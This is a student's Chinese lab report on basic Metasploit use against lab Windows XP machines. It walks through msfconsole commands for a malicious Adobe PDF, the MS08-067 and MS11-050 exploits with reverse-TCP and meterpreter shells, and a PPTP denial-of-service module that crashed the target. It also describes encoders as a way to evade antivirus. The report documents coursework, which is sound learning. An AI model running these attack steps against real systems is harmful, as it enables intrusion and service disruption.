20145326蔡馨熤《网络对抗》——MSF基础应用

实验后回答问题

• 用自己的话解释什么是exploit,payload,encode.
• exploit：起运输的作用，将数据传输到对方主机。
• payload：其实就是指装载的“具体内容”。就相当于shellcode一样。
• encode:对需要传输的文件进行编码，使其达到免杀效果。

实验总结与体会

• 通过这次MSF基础应用的实验。我对MSF里面包括的6个模块都有了一定的认识，先是exploit模块，也就是我们说的渗透模块，包括主动渗透和被动渗透，老师在课上也生动的讲述了区别，我就不赘述了。exploit起运输的作用，将数据传输到对方主机。 post模块指的是在meterpreter中的那些具体操作，比如抓屏，抓键什么的。然后是payload模块，payload其实就是指装载的“具体内容”。就相当于shellcode一样。如果exploit相当于运载火箭，那么Payload就相当于要投放的弹头。payload有三个子目录，分别是single（独立），stager（传输器），stage（传输体）。encoder对需要传输的文件进行编码，使其达到免杀效果，还能消除像“0x00”这种坏字符；nop是空指令（0x90），在“滑翔区”中有重要的应用。最后一个是Auxiliary辅助模块，这是用来搜集情报的，哈哈哈。每一个模块都是一个源代码。我们可以在usr/share/metasploit—framework/modules/中查看每个模块。

• 这次的实验过程真的是坎坷，我的电脑又卡，开两个虚拟机确实是有点尴尬。其实操作很简单，大家一看就会，首先必须对目标很明确，要知道怎么去实施步骤。操作起来，其实就是一个套路，先确定攻击模块，使用模块的命令是use， 然后设置攻击载荷set payloads，再是在每一步的时候都要确认参数，使用show options命令观察，show targets可以查看能被攻击的操作系统等等。这里就不赘述了。但具体操作起来，就是会有各种问题，比如浏览器的版本问题，xp虚拟机的版本问题，任何一个小问题，都会让我们的实验结果不理想。不过还好，最后都一一克服了。也许这就是实验的魅力吧，老师故意给我们设置很多障碍，然后让我们自己想办法去跨越障碍，最后到达胜利的终点。重要的不是结果，重要的而是实验的这个过程，这个过程才能真正的让我们学到东西。不要轻言放弃，要激流勇进，克服一个个困难总是有成就感的！

Adobe阅读器渗透攻击

实验前准备

• 两台虚拟机，其中一台为kali，一台为windows xp sp3（老师给的xp虚拟机winxpAttaker，密码：mima1234）。

• 设置虚拟机网络为NAT模式，保证两台虚拟机可以ping通。

• kali下打开显示隐藏文件。

实验过程

• 在kali终端中开启msfconsole。

• 输入命令use exploit/windows/fileformat/adobecooltypesing，进入该漏洞模块的使用。

• 使用命令set payload windows/meterpreter/reverse_tcp设置攻击有效载荷。

• 输入命令show options显示我们需要在攻击前需要设置的数据。

• set FILENAME xxx.pdf

• set LHOST "KALI 的 Ip"

• set LPORT xxxx

• 输入exploit,生成pdf文件，可以看到pdf所在文件夹，将pdf复制到靶机里。

• 使用命令back退出当前模块，并使用use exploit/multi/handler新建一个监听模块。具体过程不赘述。

• 使用命令exploit开始攻击，在xp中打开pdf。这里pdf比较难打开。我们可以选择在kali中等结果。如下图：

• 在靶机xp中使用命令netstat -an,看本地tcp连接。

MS08_067漏洞渗透攻击实践

实验前准备

• 两台虚拟机，其中一台为kali，一台为windows xp sp3(英文版)。

• 在VMware中设置两台虚拟机网络为NAT模式，自动分配IP地址，之后两台虚拟机就可以直接ping通。

实验过程

• 最开始ping了半天，ping不通，后来发现是ip地址不在同一个网段上，需要重新设置xp的ip地址。具体过程不赘述，地球人都会。因为这里是c类地址，所以前三位一样。我的kali ip是192.168.124.130，xp ip设置为：192.168.124.128。

• 在kali终端中开启msfconsole。

• 然后输入命令search ms08_067,会显示出找到的渗透模块。

• 输入命令use exploit/windows/smb/ms08067netapi，进入该漏洞模块的使用。

• 再输入命令show payload会显示出有效的攻击载荷。

• show targets会显示出可以被攻击的靶机的操作系统型号。

• 使用命令set payload generic/shell_reverse_tcp设置攻击有效载荷。再输入命令show options显示我们需要在攻击前需要设置的数据，如下图红框圈住的部分。

• set LHOST "kali Ip"

• set RHOST "Win xp Ip"

• 看看两个主机能不能ping通。

• exploit开始攻击，在kali上执行ipconfig/all。

• 在win xp上执行同样的命令，如下图所示：

• 利用meterpreter进行MS08_067远程漏洞攻击。

• 进入ms08_067漏洞模块。

• 设置payload：set payload windows/meterpreter/reverse_tcp。

• show options,查看需要设置的ip地址。

• exploit后。ifconfig一下。

• ps一下

• 进入shell

MS02 _ 063 _ pptp_dos辅助模块的使用

实验前准备

• 两台虚拟机，其中一台为kali，一台为windows xp sp2/3。

• 设置虚拟机网络为NAT模式，保证两台虚拟机可以相互间ping通（关闭靶机防火墙）。

实验过程

• 关于辅助模块呢，不知道写啥。先show auxiliary看看。

• 挑了半天，找了个感兴趣的MS02 _ 063 _ pptp_dos。这是Windows 2000/XP中PPTP服务的拒绝服务攻击缺陷。

• 攻击者利用此缺陷仅仅能够进行拒绝服务攻击，并不能获得任何信息和任何权限。

• 风险等级:

  • Internet systems: 严重
  • Intranet systems: 低
  • Client systems: 低

• 老套路，看看有啥参数要配的。配好后exploit看看效果！可以结合微软的安全报告找感觉。有了微软的安全报告后，各种漏洞对应的年份，适用的靶机系统，攻击效果都一一对应出来了。

• 攻击靶机后，靶机蓝屏，我没来得及截屏，靶机就自己重启了。这个很厉害。

IE浏览器渗透攻击——MS11050安全漏洞

实验前准备

• 两台虚拟机，其中一台为kali，一台为windows xp sp3（包含IE7）。

• 设置虚拟机网络为NAT模式，保证两台虚拟机可以相互间ping通（关闭靶机防火墙）。

实验步骤

• 在kali终端中开启msfconsole。

• 输入命令use windows/browser/ms11050mshtml_cobjectelement，进入该漏洞模块。

• 输入info查看信息：

• show targets看看目标：

• 再show option，都是老套路。

• 配好后看看。

• 然后exploit攻击！可以看见生成一个网址。

• 然后我们在靶机上登陆这个网址。最开始打不开，后面得知是浏览器的问题，于是我下了个IE7，问题才得到解决。

• 这个时候kali中显示一个session 1已经创建，输入命令sessions -i 1,开始连接。然后攻击成功了，抓个屏吧。再获取shell。

20145326蔡馨熤《网络对抗》——MSF基础应用的更多相关文章

1. 20145326蔡馨熤《网络对抗》—— Web安全基础实践

   20145326蔡馨熤<网络对抗>—— Web安全基础实践 1.实验后回答问题 (1)SQL注入攻击原理,如何防御. 原理: SQL注入攻击指的是通过构建特殊的输入作为参数传入Web应用程 ...

2. 20145326蔡馨熤《网络对抗》—— Web基础

   20145326蔡馨熤<网络对抗>—— Web基础 1.实验后回答问题 (1)什么是表单. 表单是一个包含表单元素的区域,表单元素是允许用户在表单中输入信息的元素,表单在网页中主要负责数据 ...

3. 20145326蔡馨熠《网络对抗》shellcode注入&amp&semi;Return-to-libc攻击深入

   20145326蔡馨熠<网络对抗>shellcode注入&Return-to-libc攻击深入 准备一段shellcode 首先我们应该知道,到底什么是shellcode.经过上网 ...

4. 20145208 蔡野 《网络对抗》Exp5 MSF基础应用

   20145208 蔡野 <网络对抗>Exp5 MSF基础应用 链接地址 主动攻击:利用ms08_067_netapi进行攻击 对浏览器攻击:MS10-002 对客户端攻击:adobe_to ...

5. 20145208 蔡野 《网络对抗》免考项目 MSF学习

   20145208 蔡野 <网络对抗>免考项目 MSF Exploit模块开发 题目:MSF Exploit模块开发 摘要 本免考项目的目标是通过对msf模块的设计语言--ruby和expl ...

6. 20145208 蔡野 《网络对抗》Exp9 web安全基础实践

   20145208 蔡野 <网络对抗>Exp9 web安全基础实践 本实践的目标理解常用网络攻击技术的基本原理.Webgoat实践下相关实验. 实验后回答问题 (1)SQL注入攻击原理,如何 ...

7. 20145208 蔡野 《网络对抗》Exp8 Web基础

   20145208 蔡野 <网络对抗>Exp8 Web基础 本实践的具体要求有: (1).Web前端HTML(1分) 能正常安装.启停Apache.理解HTML,理解表单,理解GET与POS ...

8. 20145208蔡野 《网络对抗》逆向及BOF基础实践

   20145208蔡野 <网络对抗>逆向及BOF基础实践 逆向及Bof基础实践 实践目标 本次实践的对象是一个名为pwn1的linux可执行文件. 该程序正常执行流程是:main调用foo函 ...

9. 20145221高其&amp&semi;20145326蔡馨熠《信息安全系统设计基础》实验二 固件设计

   20145221高其&20145326蔡馨熠<信息安全系统设计基础>实验二 固件设计 实验目的与要求 了解多线程程序设计的基本原理,学习 pthread 库函数的使用. 了解在 l ...

随机推荐

1. IOS开发 应用程序图标数字角标

   其实实现这个功能很简单,只要调用UIApplication即可.   用法用例:[UIApplication sharedApplication].applicationIconBadgeNumber ...

2. ubuntu下卸载vmware

   直接crl+alt+t打开一个terminal,然后输入sudo vmware-installer --uninstall-product vmware-workstation即可卸载!操作如下图: ...

3. 【CentOs】搭建svn服务器

   参考资料: svn攻略: http://blog.csdn.net/colinchan/article/details/1865154 错误解决:http://hi.baidu.com/anglem/ ...

4. 命令 修改WAMP中mysql默认空密码

   WAMP安装好后,mysql密码是为空的,那么要如何修改呢?其实很简单,通过几条指令就行了,下面我就一步步来操作. 首先,通过WAMP打开mysql控制台. 提示输入密码,因为现在是空, WAMP安装 ...

5. AJAX数据请求

   ajax数据请求需要四个步骤:(请求文本内容) 1.创建XMLHttpRequest对象: 2.打开与服务起的链接: 3.发送给服务器: 4.响应就绪. <!DOCTYPE html> & ...

6. 关于在jsp中的路径问题

   前言: jsp作为javaweb开发中常见的视图技术,我们平时在开发项目使用的过程中,经常会导入一些静态资源,比如css\js\jpg.png等图片格式的文件,这些文件的路径成了问题,经常会出现索引不 ...

7. mac 上安装 nvm 遇到的坑

   本人之前在 mac 上已经装过 nvm 了,今天帮朋友在他电脑上装,由于是新版本,没想到有点坑. ** 一定要参考官方文档 一.命令行安装  (图片来自 github ) 意思是,无论你安装还是更新 ...

8. 内核空间内存申请函数kmalloc kzalloc vmalloc的区别

   我们都知道在用户空间动态申请内存用的函数是 malloc(),这个函数在各种操作系统上的使用是一致的,对应的用户空间内存释放函数是 free().注意:动态申请的内存使用完后必须要释放,否则会造成内存 ...

9. Win10年度更新开发必备：VS2015 Update 2正式版下载汇总

   ========================================================================== 微软在03月30日发布了Visual Studio ...

10. 【MyBatis】MyBatis之别名typeAliases标签的使用

    <configuration> <typeAliases> <typeAlias alias="Dept" type="cn.xdl.ent ...